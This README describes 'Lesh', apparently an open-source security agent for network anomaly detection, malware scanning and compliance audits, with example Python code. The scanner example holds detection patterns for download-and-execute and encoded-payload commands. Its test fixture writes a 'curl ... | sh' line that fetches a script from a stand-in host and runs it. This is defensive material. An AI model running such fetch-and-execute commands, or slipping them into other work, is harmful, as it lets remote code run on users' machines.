An intelligent security solution that autonomously detects and responds to cybersecurity threats in real-time, combining traditional rule-based detection methods with advanced machine learning algorithms.
- Overview
- Key Features
- Installation
- Quick Start Guide
- Configuration
- Detection Modules
- Dashboard
- Machine Learning Models
- API Reference
- Development
- Testing
- License
- Troubleshooting
## Overview

Lesh is a comprehensive security solution designed to monitor, detect, and automatically respond to cyber threats with minimal human intervention. It leverages both rule-based detection and advanced machine learning to identify known and unknown threats, providing robust protection for your infrastructure.
## Key Features

- Network Anomaly Detection: Identifies unusual patterns in network traffic
- Malware Detection: Scans for malicious software and suspicious behaviors
- Compliance Checking: Ensures system configurations adhere to security best practices
- Machine Learning-based Detection: Uses isolation forest algorithm for anomaly detection
- Automated threat containment: Isolation of compromised systems
- Connection blocking: Prevention of malicious network traffic
- Process termination: Stopping of suspicious executables
- Notification systems: Email alerts for security incidents
- Interactive Dashboard: Real-time monitoring of security events
- System Health Monitoring: Track system resource usage
- Security Events Timeline: Chronological view of detected threats
- Severity Distribution: Visual breakdown of threat severity
## Installation

- Python 3.8 or higher
- pip package manager

```bash
# Clone the repository
git clone https://github.com/your-username/autonomous-cybersec-agent.git
cd autonomous-cybersec-agent

# Create and activate a virtual environment
python -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

# Install in development mode
pip install -e .
```
## Quick Start Guide

- Run the complete agent with dashboard and API:

  ```bash
  python run.py --all
  ```

- Run only specific components:

  ```bash
  # Run only the dashboard
  python run.py --dashboard
  # Run only the API server
  python run.py --api
  # Run only the security agent
  python run.py --agent
  ```

- Access the dashboard:

  Open your web browser and navigate to: http://localhost:8050
## Detection Modules

The agent includes several detection modules:

### Network Anomaly Detection

Monitors network traffic for unusual patterns such as:
- Connection count spikes
- Bandwidth usage anomalies
- Packet rate anomalies
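A minimal form of the three spike checks above, as an added example that is not the project's own detector: it keeps a rolling baseline per metric and flags readings that deviate sharply from it. It assumes a median/MAD baseline from the standard library instead of the isolation forest model the project uses, and the per-minute readings are constructed for the example.

```python
"""Per-metric spike detection over interval network statistics.

Added example (not the project's own detector): it uses a rolling
median/MAD baseline from the standard library instead of the isolation
forest model the README describes, so it runs without any ML dependency.
"""
from statistics import median

# The three signals the README lists for this module.
METRICS = ("connections", "bytes_per_sec", "packets_per_sec")

# Constructed sample data: one reading per minute from a host's interface.
# Readings 0-9 are a quiet baseline; reading 10 is a connection-count and
# packet-rate spike (the shape of a scan or connection flood); reading 11
# is a bandwidth spike (the shape of a large transfer).
SAMPLES = [
    {"connections": 38, "bytes_per_sec": 118_000, "packets_per_sec": 290},
    {"connections": 41, "bytes_per_sec": 125_000, "packets_per_sec": 310},
    {"connections": 40, "bytes_per_sec": 121_000, "packets_per_sec": 300},
    {"connections": 43, "bytes_per_sec": 130_000, "packets_per_sec": 320},
    {"connections": 39, "bytes_per_sec": 119_000, "packets_per_sec": 295},
    {"connections": 42, "bytes_per_sec": 127_000, "packets_per_sec": 315},
    {"connections": 40, "bytes_per_sec": 122_000, "packets_per_sec": 305},
    {"connections": 37, "bytes_per_sec": 116_000, "packets_per_sec": 285},
    {"connections": 44, "bytes_per_sec": 133_000, "packets_per_sec": 325},
    {"connections": 41, "bytes_per_sec": 124_000, "packets_per_sec": 308},
    {"connections": 450, "bytes_per_sec": 126_000, "packets_per_sec": 1900},
    {"connections": 40, "bytes_per_sec": 2_400_000, "packets_per_sec": 1600},
]


def robust_baseline(history, metric):
    """Median and median absolute deviation of one metric over a window.

    The median ignores a single earlier spike inside the window, so one
    anomaly does not inflate the baseline used to judge the next reading.
    """
    values = [sample[metric] for sample in history]
    med = median(values)
    mad = median(abs(v - med) for v in values)
    return med, mad


def robust_z(value, med, mad, floor_ratio=0.05):
    """Deviation from the baseline in units of the baseline's typical spread.

    Edge case: a perfectly flat metric has MAD 0, which would make any change
    look infinite. The spread is floored at 5% of the median (and at 1.0 for
    metrics that sit near zero) so a flat baseline still needs a real change.
    """
    spread = max(mad, floor_ratio * abs(med), 1.0)
    return (value - med) / spread


def detect_anomalies(samples, window=10, threshold=8.0):
    """Flag readings that exceed the rolling baseline by more than `threshold`.

    Only upward deviations are reported: a sudden drop to zero is a different
    signal (link or sensor failure) and belongs in a health check instead.
    """
    findings = []
    for i in range(window, len(samples)):
        history = samples[i - window:i]
        for metric in METRICS:
            med, mad = robust_baseline(history, metric)
            score = robust_z(samples[i][metric], med, mad)
            if score > threshold:
                findings.append({
                    "index": i,
                    "metric": metric,
                    "value": samples[i][metric],
                    "baseline": med,
                    "score": round(score, 1),
                })
    return findings


if __name__ == "__main__":
    for f in detect_anomalies(SAMPLES):
        print(f"reading {f['index']}: {f['metric']} = {f['value']} "
              f"(baseline {f['baseline']}, score {f['score']})")
```

Because the baseline is a median, the connection spike at reading 10 does not distort the window used to judge reading 11, which is still caught on its bandwidth and packet rate; a mean-based baseline would have been pulled up by the first spike and could have masked the second.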
### Malware Detection

Scans for malicious software by:
- Checking file hashes against known malware signatures
- Analyzing file contents for suspicious patterns
- Focusing on potentially dangerous file types
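The three steps above in one small scanner, as an added example that is not the project's scanner: hash lookup first, then a content check for generic indicators, both restricted to file types that can execute or carry macros. The signature set, the indicator patterns and the sample files are constructed for the example; a real deployment would load signatures from a feed.

```python
"""File scanner: hash lookup, then content indicators, on risky file types.

Added example, not the project's scanner. The signature set, the indicator
patterns and the sample files are all constructed here so the scan runs
offline; a real deployment would load signatures from a feed.
"""
import hashlib
import re
import shutil
import tempfile
from pathlib import Path

# Constructed "known malware" sample; its SHA-256 stands in for a signature feed.
KNOWN_BAD_SAMPLE = b"constructed-malicious-sample-for-this-example\n"
KNOWN_BAD_SHA256 = {hashlib.sha256(KNOWN_BAD_SAMPLE).hexdigest()}

# Only file types that can execute or carry macros get a content scan:
# the README's "focus on potentially dangerous file types".
SCAN_EXTENSIONS = {".exe", ".dll", ".bat", ".ps1", ".sh", ".py", ".js", ".vbs", ".docm"}

# Constructed content indicators (illustrative, not the project's rules):
# generic download-and-execute and encoded-command shapes.
SUSPICIOUS_PATTERNS = [
    (re.compile(rb"\bcurl\b[^\n]{0,120}\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(rb"powershell[^\n]{0,80}\s-enc(odedcommand)?\b", re.I), "encoded PowerShell command"),
    (re.compile(rb"\beval\s*\(\s*base64_decode\s*\("), "eval of base64-decoded payload"),
]

MAX_CONTENT_SCAN_BYTES = 8 * 1024 * 1024  # cap so large binaries stay cheap to scan


def sha256_file(path, chunk_size=1 << 16):
    """Stream the file through SHA-256 so large files are never fully loaded."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def scan_file(path):
    """Return {'name', 'verdict', 'reasons'} for one file.

    Verdicts: 'skipped' (type not scanned), 'malicious' (hash match),
    'suspicious' (content indicator), 'clean'.
    """
    path = Path(path)
    result = {"name": path.name, "verdict": "clean", "reasons": []}
    if path.suffix.lower() not in SCAN_EXTENSIONS:
        result["verdict"] = "skipped"
        return result
    digest = sha256_file(path)
    if digest in KNOWN_BAD_SHA256:
        result["verdict"] = "malicious"
        result["reasons"].append(f"sha256 {digest[:16]}... is a known signature")
        return result
    with open(path, "rb") as fh:
        head = fh.read(MAX_CONTENT_SCAN_BYTES)
    for pattern, label in SUSPICIOUS_PATTERNS:
        if pattern.search(head):
            result["reasons"].append(label)
    if result["reasons"]:
        result["verdict"] = "suspicious"
    return result


def scan_directory(root):
    """Scan every regular file under root, in a stable order."""
    return [scan_file(p) for p in sorted(Path(root).rglob("*")) if p.is_file()]


def demo():
    """Build a constructed directory, scan it, clean up, return name -> verdict."""
    root = Path(tempfile.mkdtemp(prefix="lesh-scan-"))
    try:
        (root / "installer.exe").write_bytes(KNOWN_BAD_SAMPLE)
        (root / "setup.sh").write_bytes(b"#!/bin/sh\ncurl -fsSL http://example.invalid/x | sh\n")
        (root / "backup.py").write_bytes(b"import shutil\nshutil.copy('a.db', 'a.bak')\n")
        # The same indicator in a .txt is skipped by the type filter. That is
        # the trade-off of focusing on dangerous types: a gap other detectors
        # (behaviour, network) have to cover.
        (root / "notes.txt").write_bytes(b"curl http://example.invalid/x | sh\n")
        return {r["name"]: r["verdict"] for r in scan_directory(root)}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:14s} {verdict}")
```

The hash check runs before the content check because it is cheap and exact; the content patterns only decide between `clean` and `suspicious`, never `malicious`, so a pattern hit is a triage signal rather than a verdict.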
### Compliance Checking

Ensures system configuration meets security best practices:
- Password policy compliance
- Firewall configuration
- System update settings
- Running services audit
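One way to structure the four checks above as a rule set, as an added example that is not the project's compliance module: each rule states the compliant condition, and anything the audit cannot evaluate counts as a failure rather than a pass. The rules, the approved-service list and the host snapshot are constructed for the example; the snapshot is the kind of data a collector would gather from the OS.

```python
"""Configuration compliance audit against a small rule set.

Added example, not the project's compliance module. The rule set, the
approved-service list and the host snapshot are constructed here; the
snapshot stands in for data a collector would read from the OS.
"""
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class Rule:
    rule_id: str
    severity: str                      # "high", "medium" or "low"
    description: str                   # the compliant state, as a statement
    check: Callable[[dict], bool]      # True when the snapshot is compliant
    evidence: Callable[[dict], str] = lambda s: ""  # detail for a failure


# Constructed allow-list for a hardened server.
ALLOWED_SERVICES = {"sshd", "cron", "rsyslog", "chronyd"}

RULES = [
    Rule("PWD-001", "medium", "Minimum password length is at least 12",
         lambda s: s["password_policy"]["min_length"] >= 12),
    Rule("PWD-002", "low", "Password maximum age is at most 365 days",
         lambda s: s["password_policy"]["max_age_days"] <= 365),
    Rule("FW-001", "high", "Host firewall is enabled",
         lambda s: s["firewall"]["enabled"] is True),
    Rule("FW-002", "high", "Firewall default inbound policy is deny",
         lambda s: s["firewall"]["default_inbound"] == "deny"),
    Rule("UPD-001", "medium", "Automatic security updates are enabled",
         lambda s: s["updates"]["automatic_security_updates"] is True),
    Rule("SVC-001", "high", "Only approved services are running",
         lambda s: set(s["running_services"]) <= ALLOWED_SERVICES,
         lambda s: "unexpected: " + ", ".join(
             sorted(set(s["running_services"]) - ALLOWED_SERVICES))),
]


def audit(snapshot):
    """Evaluate every rule; return the failures with the detail needed to fix them."""
    findings = []
    for rule in RULES:
        try:
            compliant = bool(rule.check(snapshot))
            detail = "" if compliant else rule.evidence(snapshot)
        except (KeyError, TypeError) as exc:
            # Missing or malformed data is a failure, not a pass: an audit
            # that cannot prove a control is in place must say so.
            compliant, detail = False, f"could not evaluate: {exc!r}"
        if not compliant:
            findings.append({
                "rule_id": rule.rule_id,
                "severity": rule.severity,
                "description": rule.description,
                "detail": detail,
            })
    return findings


def summarize(findings):
    """Count failures per severity so a dashboard can show one number per level."""
    counts = {"high": 0, "medium": 0, "low": 0}
    for finding in findings:
        counts[finding["severity"]] += 1
    return counts


# Constructed snapshot of a host that has drifted from the baseline.
SNAPSHOT = {
    "password_policy": {"min_length": 8, "max_age_days": 90},
    "firewall": {"enabled": True, "default_inbound": "allow"},
    "updates": {"automatic_security_updates": True},
    "running_services": ["sshd", "cron", "rsyslog", "telnetd"],
}


if __name__ == "__main__":
    results = audit(SNAPSHOT)
    for f in results:
        print(f"[{f['severity']:6s}] {f['rule_id']}: {f['description']} {f['detail']}")
    print(summarize(results))
```

The `except` branch is the part worth copying: a collector that fails to read the update settings should surface as a failed control, otherwise a broken sensor silently turns into a compliant host.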
## Dashboard

The dashboard provides real-time monitoring and visualization:

- Active Threats Counter: Number of current high-severity threats
- Events Today: Count of security events in the past 24 hours
- System Health: Overall status based on system metrics
- Security Events Timeline: Chronological view of detected threats
- Event Severity Distribution: Breakdown of threats by severity level
- System Metrics: CPU, memory, disk usage, and network traffic

To access the dashboard, run:

```bash
python run.py --dashboard
```
The new dashboard provides real-time monitoring with advanced visualization capabilities:
- Interactive Security Visualizations: Dynamic threat maps, timelines, and 3D visualizations
- Real-time Metrics: Active threats, system health, and security event tracking
- Multi-tab Interface: Organize security data into Overview, Network, System, Alerts and Advanced tabs
- Advanced Analytics: AI-powered threat analysis and predictive metrics
To run the dashboard:

```bash
# Install required dependencies first
pip install -r requirements.txt

# Start the dashboard
python run.py --dashboard

# Or run all components together
python run.py --all
```

Then open your web browser and navigate to: http://localhost:8050
- Security Status Monitoring: Real-time status indicators show current threat levels
- Threat Analysis: View detailed breakdowns of security events by severity and type
- Network Visualization: Interactive network topology map showing attack patterns
- System Health: Monitor system resource usage and health metrics
- Alert Management: Filter and review security alerts by severity
- Advanced 3D Visualization: Explore the threat landscape in 3D with the advanced view
## Machine Learning Models

The agent uses machine learning for advanced threat detection:
- Anomaly Detector: Identifies unusual network traffic patterns
- Threat Classifier: Categorizes detected anomalies by threat type
- Behavior Analyzer: Tracks and flags unusual system behavior
To train the machine learning models:

```bash
python train_models.py
```

To train with custom data:

```bash
python train_models.py --data your_data.csv
```

Edit the ML configuration file:

```bash
nano config/ml_models.json
```
## API Reference

The agent provides a REST API for integration with other tools.

```bash
python run.py --api
```

| Endpoint | Method | Description |
|---|---|---|
| `/` | GET | API information and status |
| `/detect` | POST | Submit traffic data for anomaly detection |
| `/explain` | POST | Get explanations for detected anomalies |
| `/status` | GET | Get agent status information |
## Testing

Run the test suite to ensure everything is working:

```bash
pytest tests/
```

For specific test files:

```bash
pytest tests/test_anomaly_detector.py
pytest tests/test_email_notifications.py
pytest tests/test_dashboard.py
```
## License

This project is licensed under the MIT License - see the LICENSE file for details.
## Troubleshooting

- Import errors: Make sure all dependencies are installed with `pip install -r requirements.txt`
- Permission issues: Some detection and response capabilities require administrative privileges
- Dashboard not loading: Check if the correct port (8050) is available
- ML models not working: Ensure models are trained before trying to use them
If you encounter any problems, please open an issue on the GitHub repository.